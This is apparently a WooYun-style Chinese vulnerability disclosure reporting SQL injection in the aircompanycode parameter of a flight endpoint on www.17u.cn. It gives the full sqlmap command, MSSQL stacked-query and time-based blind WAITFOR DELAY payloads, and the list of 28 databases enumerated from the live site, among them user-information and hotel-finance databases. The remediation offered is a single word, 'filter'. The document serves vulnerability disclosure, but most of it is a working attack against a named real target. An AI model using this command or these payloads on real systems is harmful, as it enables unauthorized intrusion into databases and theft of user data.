简要描述:
0.0
详细说明:
注入点:www.17u.cn/flight/ajaxcn.ashx?aircompanycode=&descityid=0&desportcode=&maxperpage=5&orgcityid=0&orgportcode=&r=function%20getSeconds()%20{%20%20%20%20[native%20code]}&Type=getdpdata&typevalue=3
get参数aircompanycode存在注入
通知存在注入点,未做进一步测试!
python sqlmap.py -u “www.17u.cn/flight/ajaxcn.ashx?aircompanycode=&descityid=0&desportcode=&maxperpage=5&orgcityid=0&orgportcode=&r=function%20getSeconds()%20{%20%20%20%20[native%20code]}&Type=getdpdata&typevalue=3″ –user-agent=”Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36” –batch –dbs
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
—
Place: GET
Parameter: aircompanycode
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: aircompanycode=’; WAITFOR DELAY ‘0:0:5′–&descityid=0&desportcode=&maxperpage=5&orgcityid=0&orgportcode=&r=function getSeconds() { [native code]}&Type=getdpdata&typevalue=3
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: aircompanycode=’ WAITFOR DELAY ‘0:0:5’–&descityid=0&desportcode=&maxperpage=5&orgcityid=0&orgportcode=&r=function getSeconds() { [native code]}&Type=getdpdata&typevalue=3
available databases [28]:
[*] 17u_net
[*] 17uEbookingHistory
[*] IpData
[*] master
[*] model
[*] msdb
[*] TCB2cBlog
[*] TCB2cWenDa
[*] TCCar
[*] TCCline
[*] TCCLineResource
[*] TCEbook
[*] TCFly
[*] TCFlyUtility
[*] TCHotel
[*] TCHotelFinance
[*] TCHotelOrder
[*] TCHotelRedundant
[*] TCHotelResource
[*] TCMapBarData
[*] TCMapBarDataClass
[*] TCScenery
[*] TcSceneryParameter
[*] TcSceneryResource
[*] TCShare
[*] TCUserInfo
[*] TCWEB
[*] tempdb
漏洞证明:
_770.png
修复方案:
过滤
版权声明:转载请注明来源 秋风@乌云
评论关闭。